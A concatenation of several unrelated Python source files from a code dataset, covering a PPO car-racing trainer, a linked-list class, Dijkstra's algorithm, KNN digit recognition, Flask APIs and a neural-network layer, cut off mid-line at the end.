neural network\n '''\n\n def __init__(self, input_features, n_actions, hidden_size, out_size):\n super(A2C_policy, self).__init__()\n\n self.lp = nn.Sequential(\n nn.Linear(input_features, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU()\n )\n\n self.mean_1 = nn.Linear(hidden_size, n_actions)\n self.mean_1.weight.data.mul_(0.1)\n\n self.logstd = nn.Parameter(torch.zeros(n_actions))\n\n def forward(self, x):\n # ot_n = self.lp(x.float())\n ot_n = self.lp(x)\n return torch.tanh(self.mean_1(ot_n))\n\n\nclass A2C_value(nn.Module):\n '''\n Actor network\n '''\n\n def __init__(self, input_features, hidden_size):\n super(A2C_value, self).__init__()\n\n self.lp = nn.Sequential(\n nn.Linear(input_features, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, 1)\n )\n\n def forward(self, x):\n return self.lp(x.float())\n\n\nclass Env:\n '''\n Enviornment class\n '''\n\n game_rew = 0\n last_game_rew = 0\n game_n = 0\n last_games_rews = [-200]\n n_iter = 0\n\n def __init__(self, env_name, n_steps, gamma, gae_lambda, save_video=False):\n super(Env, self).__init__()\n\n # create the new env\n self.env = gym.make(env_name)\n self.obs = self.env.reset()\n\n self.n_steps = n_steps\n self.action_n = self.env.action_space.shape\n self.observation_n = self.env.observation_space.shape[0]\n self.gamma = gamma\n self.gae_lambda = gae_lambda\n\n def steps(self, agent_policy, agent_value, conv):\n '''\n Execute the agent n_steps in the enviornment\n '''\n memories = []\n for s in range(self.n_steps):\n self.n_iter += 1\n state = conv(self.obs)\n self.env.render()\n # print(state.shape)\n\n # get the agent policy\n # ag_mean = agent_policy(torch.tensor(self.obs))\n ag_mean = agent_policy(state)\n\n # get an action following the policy distribution\n logstd = agent_policy.logstd.data.cpu().numpy()\n action = ag_mean.data.cpu().numpy() + np.exp(logstd) * \\\n np.random.normal(size=logstd.shape)\n action = np.clip(action, -1, 1)\n\n # PROBABLY NEED TO CHANGE THIS PART TO ACCOUNT FOR CONV NET\n # state_value = float(agent_value(torch.tensor(self.obs)))\n state_value = float(agent_value(state))\n new_obs, reward, done, _ = self.env.step(action)\n\n # Update memories with latest action\n if done:\n # Change the reward to 0 in case the episode is end\n memories.append(Memory(obs=self.obs, state=state, action=action, new_obs=new_obs,\n reward=0, done=done, value=state_value, adv=0))\n else:\n memories.append(Memory(obs=self.obs, state=state, action=action, new_obs=new_obs,\n reward=reward, done=done, value=state_value, adv=0))\n\n self.game_rew += reward\n self.obs = new_obs\n # print(self.obs.shape)\n if done:\n print('#####', self.game_n, 'rew:', int(self.game_rew), int(\n np.mean(self.last_games_rews[-100:])), np.round(reward, 2), self.n_iter)\n\n # reset the enviornment\n self.obs = self.env.reset()\n self.last_game_rew = self.game_rew\n self.game_rew = 0\n self.game_n += 1\n self.n_iter = 0\n self.last_games_rews.append(self.last_game_rew)\n\n # compute the discount reward of the memories and return it\n return self.generalized_advantage_estimation(memories)\n\n def generalized_advantage_estimation(self, memories):\n '''\n Calculate the advantage discounted reward as in the paper\n '''\n upd_memories = []\n run_add = 0\n\n for t in reversed(range(len(memories) - 1)):\n if memories[t].done:\n run_add = memories[t].reward\n else:\n sigma = memories[t].reward + self.gamma * \\\n memories[t + 1].value - memories[t].value\n run_add = sigma + run_add + self.gamma * self.gae_lambda\n\n # Update memories with discounted reward\n upd_memories.append(Memory(obs=memories[t].obs, state=memories[t].state, action=memories[t].action, new_obs=memories[t].new_obs,\n reward=run_add + memories[t].value, done=memories[t].done, value=memories[t].value, adv=run_add))\n\n return upd_memories[::-1]\n\n\ndef log_policy_prob(mean, std, actions):\n # policy log probability\n act_log_softmax = -((mean - actions)**2) / (2 * torch.exp(std).clamp(min=1e-4)\n ) - torch.log(torch.sqrt(2 * math.pi * torch.exp(std)))\n return act_log_softmax\n\n\ndef compute_log_policy_prob(memories, nn_policy, device):\n '''\n run the policy on the observation in the memory and compute the policy log probability \n '''\n # n_mean = nn_policy(torch.tensor(\n # np.array([m.obs for m in memories], dtype=np.float32)).to(device))\n # Why is this breaking here?\n # n_mean = nn_policy(torch.tensor(\n # np.array([m.state for m in memories], dtype=np.float32)).to(device))\n # print( torch.tensor(np.array([m.obs for m in memories], dtype=np.float32)).size() )\n # print( torch.tensor([m.state.cpu().detach().numpy() for m in memories]).size() )\n\n n_mean = nn_policy(torch.tensor(\n [m.state.cpu().detach().numpy() for m in memories]).to(device))\n n_mean = n_mean.type(torch.DoubleTensor)\n logstd = agent_policy.logstd.type(torch.DoubleTensor)\n\n actions = torch.DoubleTensor(\n np.array([m.action for m in memories])).to('cpu')\n\n return log_policy_prob(n_mean, logstd, actions)\n\n\nMemory = namedtuple('Memory', ['obs', 'state', 'action', 'new_obs',\n 'reward', 'done', 'value', 'adv'], verbose=False, rename=False)\n\n\ndef clipped_PPO_loss(memories, nn_policy, nn_value, old_log_policy, adv, epsilon, writer, device):\n '''\n Clipped PPO loss as in the paper\n It returns the clipped policy loss and the value loss\n '''\n\n # State value\n rewards = torch.tensor(\n np.array([m.reward for m in memories], dtype=np.float32)).to(device)\n value = nn_value(torch.tensor(\n np.array([m.obs for m in memories], dtype=np.float32)).to(device))\n # Value loss\n vl_loss = F.mse_loss(value.squeeze(-1), rewards)\n\n new_log_policy = compute_log_policy_prob(memories, nn_policy, device)\n rt_theta = torch.exp(new_log_policy - old_log_policy)\n\n adv = adv.unsqueeze(1)\n pg_loss = -torch.mean(torch.min(rt_theta * adv,\n torch.clamp(rt_theta, 1 - epsilon, 1 + epsilon) * adv))\n\n return pg_loss, vl_loss\n\n\ndef clipped_PPO_loss_plusconv(memories, nn_policy, nn_value, old_log_policy, adv, epsilon, writer, device):\n '''\n Clipped PPO loss as in the paper\n It returns the clipped policy loss and the value loss\n '''\n\n # State value\n rewards = torch.tensor(\n np.array([m.reward for m in memories], dtype=np.float32)).to(device)\n # value = nn_value(torch.tensor(\n # np.array([m.obs for m in memories], dtype=np.float32)).to(device))\n value = nn_value(torch.tensor(\n [m.state.cpu().detach().numpy() for m in memories]).to(device))\n\n # Value loss\n vl_loss = F.mse_loss(value.squeeze(-1), rewards)\n\n new_log_policy = compute_log_policy_prob(memories, nn_policy, device)\n rt_theta = torch.exp(new_log_policy - old_log_policy).to(device)\n\n adv = adv.unsqueeze(1)\n pg_loss = -torch.mean(torch.min(rt_theta * adv,\n torch.clamp(rt_theta, 1 - epsilon, 1 + epsilon) * adv))\n\n conv_loss = torch.tensor(\n np.sqrt(pg_loss.item()**2 + vl_loss.item()**2), requires_grad=True)\n\n return pg_loss, vl_loss, conv_loss\n\n\ndef test_game(test_env, agent_policy, conv_net, test_episodes):\n reward_games = []\n steps_games = []\n\n for _ in range(test_episodes):\n obs = test_env.reset()\n rewards = 0\n steps = 0\n while True:\n test_env.render()\n state = conv_net(obs)\n ag_mean = agent_policy(state.clone().detach())\n action = np.clip(ag_mean.data.cpu().numpy().squeeze(), -1, 1)\n\n next_obs, reward, done, _ = test_env.step(action)\n steps += 1\n obs = next_obs\n rewards += reward\n\n if done:\n reward_games.append(rewards)\n steps_games.append(steps)\n obs = test_env.reset()\n break\n\n return np.mean(reward_games), np.mean(steps_games)\n\n\n# HYPERPARAMETERS\n# ENV_NAME = 'BipedalWalker-v2'\nENV_NAME = 'CarRacing-v0'\n\nMAX_ITER = 500000\n\nBATCH_SIZE = 128\nPPO_EPOCHS = 10\ndevice = 'cpu'\n# if torch.cuda.is_available:\n# device = 'cuda'\nCLIP_GRADIENT = 0.2\nCLIP_EPS = 0.2\n\nTRAJECTORY_SIZE = 2049\nGAE_LAMBDA = 0.95\nGAMMA = 0.99\n\n\n# Test hyperparameters\ntest_episodes = 5\nbest_test_result = -1e5\nsave_vido_test = True\nN_ITER_TEST = 100\n\nPOLICY_LR = 0.0004\nVALUE_LR = 0.001\nCONV_LR = 0.00005\n\nhidden_layer_size = 32\n# YOU SHOULD TOTALLY MAKE THIS PROGRAMATIC\nconv_out_size = 4096\n\nnow = datetime.datetime.now()\ndate_time = \"{}_{}.{}.{}\".format(now.day, now.hour, now.minute, now.second)\n\nload_model = False\ncheckpoint_name = \"checkpoints\"\n\n\nif __name__ == \"__main__\":\n # Create the env\n env = Env(ENV_NAME, TRAJECTORY_SIZE, GAMMA, GAE_LAMBDA)\n\n writer_name = 'PPO_'+ENV_NAME+'_'+date_time+'_' + \\\n str(POLICY_LR)+'_'+str(VALUE_LR)+'_' + \\\n str(TRAJECTORY_SIZE)+'_'+str(BATCH_SIZE)\n writer = SummaryWriter(log_dir='content/runs/' + writer_name)\n\n test_env = gym.make(ENV_NAME)\n if save_vido_test:\n test_env = gym.wrappers.Monitor(test_env, \"content/TEST_VIDEOS_/\" +\n writer_name, video_callable=lambda episode_id: episode_id % 10 == 0)\n\n # Init convnet\n conv_net = ConvProcess(3, 3, device).to(device)\n # Initilize actor-critic nn\n agent_policy = A2C_policy(\n conv_out_size, test_env.action_space.shape[0], hidden_layer_size, hidden_layer_size).to(device)\n agent_value = A2C_value(conv_out_size, hidden_layer_size).to(device)\n\n # Init policy and value optimizer\n optimizer_policy = optim.Adam(\n agent_policy.parameters(), lr=POLICY_LR)\n optimizer_value = optim.Adam(\n agent_value.parameters(), lr=VALUE_LR)\n optimizer_conv = optim.Adam(conv_net.parameters(), lr=CONV_LR)\n\n # FOR LOADING A TRAINED MODEL\n if load_model:\n print('> Loading checkpoint {}'.format(checkpoint_name))\n checkpoint = torch.load(checkpoint_name)\n agent_policy.load_state_dict(checkpoint['agent_policy'])\n agent_value.load_state_dict(checkpoint['agent_value'])\n conv_net.load_state_dict(checkpoint['conv_net'])\n optimizer_policy.load_state_dict(checkpoint['optimizer_policy'])\n optimizer_value.load_state_dict(checkpoint['optimizer_value'])\n optimizer_conv.load_state_dict(checkpoint['optimizer_conv'])\n\n experience = []\n n_iter = 0\n\n while n_iter < MAX_ITER:\n # Start timer ====================================\n start = time.time()\n n_iter += 1\n\n e1 = threading.Thread(target=env.steps, args=(agent_policy, agent_value, conv_net)) \n e2 = threading.Thread(target=env.steps, args=(agent_policy, agent_value, conv_net))\n e1.start()\n e2.start()\n batch0 = e1.join()\n batch1 = e2.join()\n\n batch = list(batch0) + list(batch1)\n\n # batch = env.steps(agent_policy, agent_value, conv_net)\n\n # compute the policy probability with the old policy network\n old_log_policy = compute_log_policy_prob(batch, agent_policy, device)\n\n # Gather the advantage from memory\n batch_adv = np.array([m.adv for m in batch])\n # NOMRALIZE TO STABILIZE NETWORK\n batch_adv = (batch_adv - np.mean(batch_adv)) / \\\n (np.std(batch_adv) + 1e-7)\n batch_adv = torch.tensor(batch_adv).to(device)\n\n # Variables for loss\n pol_loss_acc = []\n val_loss_acc = []\n conv_loss_acc = []\n\n # execute PPO_EPOCHS epochs\n for s in range(PPO_EPOCHS):\n # compute the loss and optimize over mini batches od the size BATCH_SIZE\n for mb in range(0, len(batch), BATCH_SIZE):\n mini_batch = batch[mb: mb + BATCH_SIZE]\n minib_old_log_policy = old_log_policy[mb: mb + BATCH_SIZE]\n minib_adv = batch_adv[mb: mb + BATCH_SIZE]\n\n # compute the PPO clipped loss and the value loss\n # pol_loss, val_loss = clipped_PPO_loss(\n # mini_batch, agent_policy, agent_value, minib_old_log_policy, minib_adv, CLIP_EPS, writer, device)\n pol_loss, val_loss, conv_loss = clipped_PPO_loss_plusconv(\n mini_batch, agent_policy, agent_value, minib_old_log_policy, minib_adv, CLIP_EPS, writer, device)\n\n # optimize policy network\n optimizer_policy.zero_grad()\n if s < PPO_EPOCHS:\n pol_loss.backward(retain_graph=True)\n else:\n pol_loss.backward()\n optimizer_policy.step()\n\n # optimize the value network\n optimizer_value.zero_grad()\n if s < PPO_EPOCHS:\n val_loss.backward(retain_graph=True)\n else:\n val_loss.backward()\n optimizer_value.step()\n\n # optimize the conv network\n # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! HEY YOU NEED TO MAKE THIS WORK !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n optimizer_conv.zero_grad()\n # if s < PPO_EPOCHS:\n # conv_loss.backward(retain_graph=True)\n # else:\n conv_loss.backward()\n optimizer_conv.step()\n\n pol_loss_acc.append(float(pol_loss))\n val_loss_acc.append(float(val_loss))\n conv_loss_acc.append(float(conv_loss))\n\n print(time.time() - start)\n\n # add scalars to the tensorboard\n writer.add_scalar('pg_loss', np.mean(pol_loss_acc), n_iter)\n writer.add_scalar('vl_loss', np.mean(val_loss_acc), n_iter)\n writer.add_scalar('rew', env.last_game_rew, n_iter)\n writer.add_scalar('10rew', np.mean(env.last_games_rews[-100:]), n_iter)\n\n # Test the agent\n if n_iter % N_ITER_TEST == 0:\n test_rews, test_stps = test_game(\n test_env, agent_policy, conv_net, test_episodes)\n print(' > Testing..', n_iter, test_rews, test_stps)\n # if it achieve the best results so far, save the models\n if test_rews > best_test_result:\n os.remove(\"ppo_conv.pt\")\n os.remove('ppo_policy.pt')\n os.remove('ppo_value.pt')\n torch.save(conv_net, 'ppo_conv.pt')\n torch.save(agent_policy, 'ppo_policy.pt')\n torch.save(agent_value, 'ppo_value.pt')\n # print(agent.state_dict())\n print(\"Saved model of game\", n_iter)\n\n torch.save({\n 'agent_policy': agent_policy.state_dict(),\n 'agent_value': agent_value.state_dict(),\n 'conv_net': conv_net.state_dict(),\n 'optimizer_policy': optimizer_policy.state_dict(),\n 'optimizer_value': optimizer_value.state_dict(),\n 'optimizer_conv': optimizer_conv.state_dict(),\n 'test_reward': test_rews\n }, 'checkpoints/checkpoint_'+writer_name+'.pth.tar')\n best_test_result = test_rews\n print('=> Best test!! Reward:{:.2f} Steps:{}'.format(\n test_rews, test_stps))\n\n writer.add_scalar('test_rew', test_rews, n_iter)\n\n writer.close()\n","sub_path":"ppo/ASYNC_train.py","file_name":"ASYNC_train.py","file_ext":"py","file_size_in_byte":17885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"547859704","text":"class No:\n def __init__(self,item = None,proximo = None):\n self.item = item\n self.proximo = proximo\n \nclass Lista:\n def __init__(self):\n self.primeiro = self.ultimo = No()\n self.tamanhoLista = 0\n def vazia(self):\n return self.primeiro == self.ultimo\n def inserir(self,item):\n self.ultimo.proximo = No(item)\n self.ultimo = self.ultimo.proximo\n self.tamanhoLista += 1\n def inserirInicio(self, item):\n self.primeiro.proximo = No(item,self.primeiro.proximo)\n if self.vazia():\n self.ultimo = self.primeiro.proximo\n self.tamanhoLista += 1 \n def inserirOrdenado(self,item):\n if vazia():\n self.inserir(item)\n anteiror = self.primeiro\n atual = self.primeiro.proximo\n while not atual is None and atual.item < item:\n anterior = atual\n atual = anteiror.proximo\n anterior.proximo = No(item,atual)\n if atual is None:\n self.ultimo = anteiror.proximo\n self.tamanhoLista += 1\n def inserirAres(self,verticeA,verticeB):\n aux = self.primeiro.proximo\n verificador = 0\n while verificador < verticeA and not aux is None:\n aux = aux.proximo\n verificador += 1\n aux.item.append(verticeB)\n verificador = 0\n aux = self.primeiro.proximo\n while verificador < verticeB and not aux is None:\n aux = aux.proximo\n verificador += 1\n aux.item.append(verticeA)\n def pesquisa(self, item):\n aux = self.primeiro.proximo\n while not aux is None and aux.item != item:\n aux = aux.proximo\n return aux is None and None or aux.item\n def removerInicio(self):\n if self.vazia():\n return None\n aux = self.primeiro.proximo\n self.primeiro.proximo = aux.proximo\n item = aux.item\n if aux == self.ultimo:\n self.ultimo = self.primeiro\n aux.proximo = None\n del aux\n return item\n def removerFim(self):\n if self.vazia():\n return None\n aux = self.primeiro\n while aux.proximo != self.ultimo:\n aux = aux.proximo\n item = self.ultimo.item\n ultimo = aux\n aux = ultimo.proximo\n ultimo.proximo = None\n del aux\n return item\n def __str__(self):\n s = \"[\"\n aux = self.primeiro.proximo\n while not aux is None:\n s += str(aux.item) + ','\n aux = aux.proximo\n s = s.strip(\",\")\n s += \"]\"\n return s\n def __getitem__(self, index):\n if self.vazia():\n return IndexError(\"A lista se encontra vazia\")\n if index > tamanhoLista or index < 0:\n return IndexError(\"index inválido\")\n aux = self.primeiro.proximo\n ponteiro = 0\n while index > ponteiro:\n aux = aux.proximo\n ponteiro += 1\n if ponteiro == index:\n return aux.valor\n def __len__(self):\n return self.tamanhoLista\n","sub_path":"grafo-listas-adjacentes/Lista.py","file_name":"Lista.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"199648434","text":"#!/usr/bin/env python\n\nimport os\n\n\nclass Util:\n\n @staticmethod\n def get_input(prompt):\n try:\n return raw_input(prompt)\n except NameError:\n return input(prompt)\n\n @staticmethod\n def pick_a_role(roles):\n while True:\n for i, role in enumerate(roles):\n print(\"[{:>3d}] {}\".format(i + 1, role))\n\n prompt = 'Type the number (1 - {:d}) of the role to assume: '.format(len(roles))\n choice = Util.get_input(prompt)\n\n try:\n return list(roles.items())[int(choice) - 1]\n except IndexError:\n print(\"Invalid choice, try again.\")\n\n @staticmethod\n def touch(file_name, mode=0o600):\n flags = os.O_CREAT | os.O_APPEND\n with os.fdopen(os.open(file_name, flags, mode)) as f:\n try:\n os.utime(file_name, None)\n finally:\n f.close()\n\n # This method returns the first non-None value in args. If all values are\n # None, None will be returned. If there are no arguments, None will be\n # returned.\n @staticmethod\n def coalesce(*args):\n for number, value in enumerate(args):\n if value is not None:\n return value\n return None\n\n @staticmethod\n def unicode_to_string_if_needed(object):\n if \"unicode\" in str(object.__class__):\n return object.encode('utf-8')\n else:\n return object\n","sub_path":"aws_google_auth/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"285566743","text":"from tensorflow.keras import datasets\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n#from PIL import Image\n#虽然导入了tensorflow,但实际上并没有用到tensorflow的神经网络的框架,只是用它来得到并稍微处理了一下数据集\n# 准备数据\n(train_images, train_labels), (test_images, test_labels) = datasets.mnist.load_data()\n# 训练图像保存在一个uint8 类型的数组中,其形状为(60000, 28, 28),取值区间为[0, 255]。\n# 我们需要将其变换为一个float32 数组,其形状为(60000, 28 * 28),取值范围为0~1。\ntrain_images = train_images.reshape(60000, 28*28).astype('float32') / 255\ntest_images = test_images.reshape(10000, 28*28).astype('float32') / 255\n# 且以下是用minst数据集的训练集和测试集分别来测试这种最简单的KNN算法的准确性,我的测试结果大概是80%\\\n\n#展示数字\ndef showNum(image):\n img = image.reshape(28, 28)\n plt.imshow(img, cmap='Greys', interpolation='nearest')\n plt.show()\n return\n\n#手写部分\ndef handwrite():\n #####################↓请将下面的路径设置正确##########################\n image = Image.open('handwrite.png').convert('L') # 用PIL中的Image.open打开图像\n # .convert('L')是将图片灰度化处理,原本是彩色图片,也就是维度是(28,28,3),将其变为(28,28)\n image_arr = np.array(image) # 转化成numpy数组\n image_arr = np.reshape(image_arr, 28 * 28).astype('float32') / 255\n for i in range(28*28):\n if(image_arr[i]==1):\n image_arr[i]=0\n else:\n image_arr[i]=1\n showNum(image_arr)\n #获取训练集\n train_data = train_images[0:60000, :]\n #获取距离\n dist = (np.sqrt(np.sum(np.square(image_arr - train_data), axis=1)))\n #求距离最近的3个样本标签的众数\n minsort = dist.argsort()[:3]\n tablesort = train_labels[minsort]\n cout = np.bincount(tablesort)\n coutmax = np.argmax(cout)\n #输出结果\n print('手写结果数字结果是:',coutmax)\n return\n\n'''\n#KNN_测试部分\ndef knn_test(test_sum, train_sum,k):\n print(\"测试KNN算法的准备性\")\n accracy_num = 0\n for i in range(test_sum):\n test_data = test_images[i]\n train_data = train_images[0:train_sum, :]\n dist = (np.sqrt(np.sum(np.square(test_data-train_data), axis=1)))\n minsort=dist.argsort()[:k]\n tablesort=train_labels[minsort]\n cout = np.bincount(tablesort)\n coutmax = np.argmax(cout)\n predict = coutmax\n real_data = test_labels[i]\n if predict == real_data:\n accracy_num += 1\n #print(\"预测:\", predict, \"实际:\", real_data)\n accracy=accracy_num/test_sum\n print(\"准确性:\", accracy)\n return accracy\n'''\nhandwrite()\n","sub_path":"KNN/HandWrite/HandWrite.py","file_name":"HandWrite.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627884192","text":"#python_counter_using_generator.py\n\n#function counts up every time you call it\n\nclass my_counter:\n\tdef __init__(self, start,stop):\n\t\tself.current=start\n\t\tself.stop=stop\n\n\tdef count(self):\n\t\tprint('inside generator')\n\t\twhile self.current < self.stop:\n\t\t\tyield self.current\n\t\t\tself.current+=1\n\ncounter_obj=my_counter(2,10)\n\nfor num in counter_obj.count():\n\tprint(num)\n\n\n#now if i want to use it again, I need to create another object\nmy_gen=my_counter(2,10).count()\nprint(next(my_gen))\nprint(next(my_gen))\nprint(next(my_gen))\n\n#now this won't work if i try to use it again\n# my_gen2=counter_obj.count()\n# print(next(my_gen2))\n\n\nprint('now trying the manual version')\nclass manual_counter:\n\tdef __init__(self, start,stop):\n\t\tself.current=start\n\t\tself.stop=stop\n\n\tdef count(self):\n\t\tif self.current < self.stop:\n\t\t\tself.current+=1\n\t\t\treturn self.current\n\nmy_mc=manual_counter(1,10)\nprint(my_mc.count())\nprint(my_mc.count())\nprint(my_mc.count())\nprint(my_mc.count())","sub_path":"python_counter_using_generator.py","file_name":"python_counter_using_generator.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"181832653","text":"#Dijkstra's Algorithm\nimport collections\nimport math\nimport timeit\n\n\nclass Graph:\n def __init__(self):\n self.vertices = set()\n self.edges = collections.defaultdict(list)\n self.weights = {}\n\n def add_vertex(self, value):\n self.vertices.add(value)\n\n def add_edge(self, from_vertex, to_vertex, distance):\n if from_vertex == to_vertex: pass # no cycles allowed\n self.edges[from_vertex].append(to_vertex)\n self.weights[(from_vertex, to_vertex)] = distance\n\n def __str__(self):\n string = \"Vertices: \" + str(self.vertices) + \"\\n\"\n string += \"Edges: \" + str(self.edges) + \"\\n\"\n string += \"Weights: \" + str(self.weights)\n return string\n\n\ndef dijkstra(graph, start):\n S = set()\n delta = dict.fromkeys(list(graph.vertices), math.inf)\n previous = dict.fromkeys(list(graph.vertices), None)\n delta[start] = 0\n while S != graph.vertices:\n v = min((set(delta.keys()) - S), key=delta.get)\n for neighbor in set(graph.edges[v]) - S:\n new_path = delta[v] + graph.weights[v, neighbor]\n if new_path < delta[neighbor]:\n delta[neighbor] = new_path\n previous[neighbor] = v\n S.add(v)\n return (delta, previous)\n\n\ndef shortest_path(graph, start, end):\n delta, previous = dijkstra(graph, start)\n path = []\n vertex = end\n while vertex is not None:\n path.append(vertex)\n vertex = previous[vertex]\n path.reverse()\n return path\n\ng = Graph()\ng.add_vertex('A')\ng.add_vertex('B')\ng.add_vertex('C')\ng.add_vertex('D')\ng.add_vertex('E')\ng.add_vertex('F')\ng.add_vertex('G')\ng.add_vertex('H')\ng.add_vertex('I')\n\ng.add_edge('A', 'B', 22)\ng.add_edge('A', 'C', 9)\ng.add_edge('A', 'D', 12)\ng.add_edge('B', 'C', 35)\ng.add_edge('B', 'F', 36)\ng.add_edge('B', 'H', 34)\ng.add_edge('C', 'F', 42)\ng.add_edge('C', 'E', 65)\ng.add_edge('C', 'D', 4)\ng.add_edge('D', 'E', 33)\ng.add_edge('D', 'I', 30)\ng.add_edge('E', 'F', 18)\ng.add_edge('E', 'G', 23)\ng.add_edge('F', 'H', 24)\ng.add_edge('F', 'G', 39)\ng.add_edge('G', 'H', 25)\ng.add_edge('G', 'I', 21)\ng.add_edge('H', 'I', 19)\n\n# print(g)\n# print('###')\nprint(shortest_path(g,'A','I'))\n\nt = timeit.Timer(\"shortest_path(g,'A','I')\",\"from __main__ import shortest_path, g\")\nresults = t.repeat(5, 10000)\nfor i,item in enumerate(results):\n print(i, '\\t' , item)\n","sub_path":"program_a.py","file_name":"program_a.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"49157707","text":"from django.http import (HttpResponse,\n HttpResponseNotFound)\nfrom whats_fresh.whats_fresh_api.models import Theme\n\nimport json\nfrom .serializer import FreshSerializer\nfrom whats_fresh.whats_fresh_api.functions import get_limit\n\n\ndef theme_list(request):\n \"\"\"\n */themes/*\n\n Returns a list of all themes in the database. The ?limit= parameter\n limits the number of themes returned.\n \"\"\"\n error = {\n 'status': False,\n 'name': None,\n 'text': None,\n 'level': None,\n 'debug': None\n }\n\n limit, error = get_limit(request, error)\n\n serializer = FreshSerializer()\n queryset = Theme.objects.all()[:limit]\n\n if not queryset:\n error = {\n \"status\": True,\n \"name\": \"No Themes\",\n \"text\": \"No Themes found\",\n \"level\": \"Information\",\n \"debug\": \"\"\n }\n\n data = {\n \"themes\": json.loads(serializer.serialize(queryset)),\n \"error\": error\n }\n\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n\n\ndef theme_details(request, id=None):\n \"\"\"\n */admin/whats_fresh_api/theme/*\n\n Returns the theme data for theme .\n \"\"\"\n data = {}\n\n error = {\n 'status': False,\n 'name': None,\n 'text': None,\n 'level': None,\n 'debug': None\n }\n\n try:\n theme = Theme.objects.get(id=id)\n except Exception as e:\n data['error'] = {\n 'status': True,\n 'name': 'Theme Not Found',\n 'text': 'Theme id %s was not found.' % id,\n 'level': 'Error',\n 'debug': '{0}: {1}'.format(type(e).__name__, str(e))\n }\n return HttpResponseNotFound(\n json.dumps(data),\n content_type=\"application/json\"\n )\n\n serializer = FreshSerializer()\n\n data = json.loads(serializer.serialize(theme))\n\n data['error'] = error\n\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n","sub_path":"whats_fresh/whats_fresh_api/views/theme.py","file_name":"theme.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"400789382","text":"import json\n\nfrom flask import Blueprint, jsonify, request, render_template\n\nfrom app.models import User\nfrom app.workflow.core import WorkFlow, WorkFlowError\n\nbp = Blueprint('bp', __name__)\n\n\n@bp.route('/users/', methods=['GET'])\ndef query_records():\n user_id = request.args.get('user_id')\n if user_id:\n user = User.objects(user_id=user_id).first()\n if not user:\n return jsonify({'error': 'data not found'})\n else:\n return jsonify(user)\n else:\n return jsonify(User.objects())\n\n\n@bp.route('/users/', methods=['POST'])\ndef create_record():\n record = json.loads(request.data)\n user = User(**record)\n user.save()\n return jsonify(user)\n\n\n@bp.route('/users/', methods=['PUT'])\ndef update_record():\n record = json.loads(request.data)\n user = User.objects(user_id=record['user_id']).first()\n if not user:\n return jsonify({'error': 'data not found'})\n else:\n user.update(**record)\n return jsonify(user)\n\n\n@bp.route('/users/', methods=['DELETE'])\ndef delete_record():\n record = json.loads(request.data)\n user = User.objects(user_id=record['user_id']).first()\n if not user:\n return jsonify({'error': 'data not found'})\n else:\n user.delete()\n return jsonify(user)\n\n\n@bp.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\n@bp.route('/uploader', methods=['POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n json_ = f.read()\n try:\n workflow = WorkFlow(json_)\n except WorkFlowError as e:\n return jsonify({\"Error\": str(e)})\n else:\n workflow_history = workflow.run()\n return render_template('history.html', history=workflow_history)","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84367463","text":"import numpy as np\nfrom Optimization import Optimizers\nfrom Layers.Base import BaseLayer\n\n\nclass FullyConnected(BaseLayer):\n\n # constructor\n def __init__(self, input_size, output_size):\n super().__init__()\n self.input_size = input_size\n self.output_size = output_size\n\n # protected member: _optimizer\n self._optimizer = None\n\n self.grad_weights = None\n\n # w: (input_size+1, output_size)\n self.weights = np.random.uniform(0, 1, (self.input_size+1, self.output_size))\n\n # x:(batch_size, input_size+1)\n self.input = np.ndarray\n\n # property: optimizer, gradient_weights\n @property\n def optimizer(self):\n return self._optimizer\n\n @optimizer.setter\n def optimizer(self, new_optimizer):\n self._optimizer = new_optimizer\n\n @property\n def gradient_weights(self):\n return self.grad_weights\n\n def forward(self, input_tensor):\n # input with bias\n if (np.shape(input_tensor)[1]) == (np.shape(self.weights)[0]):\n self.input = input_tensor\n if (np.shape(input_tensor)[1] +1) == (np.shape(self.weights)[0]):\n bias = np.ones((input_tensor.shape[0], 1))\n self.input = np.hstack((input_tensor, bias))\n\n out = np.dot(self.input, self.weights)\n return out\n\n def backward(self, error_tensor):\n # x_grad w/o bias\n weights_no_bias = self.weights[0:-1, :]\n error = np.dot(error_tensor, weights_no_bias.T)\n\n # w_grad\n self.grad_weights = np.dot(self.input.T, error_tensor)\n\n # update weights\n if self.optimizer is not None:\n self.weights = self.optimizer.calculate_update(self.weights, self.gradient_weights)\n\n return error\n\n def initialize(self, weights_initializer, bias_initializer):\n self.weights = weights_initializer.initialize( (self.input_size, self.output_size), self.input_size, self.output_size)\n self.bias = bias_initializer.initialize( (1, self.output_size), self.input_size, self.output_size )\n\n self.weights = np.vstack((self.weights, self.bias))\n","sub_path":"Exercise 3/Layers/FullyConnected.py","file_name":"FullyConnected.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507029081","text":"from django.shortcuts import render, 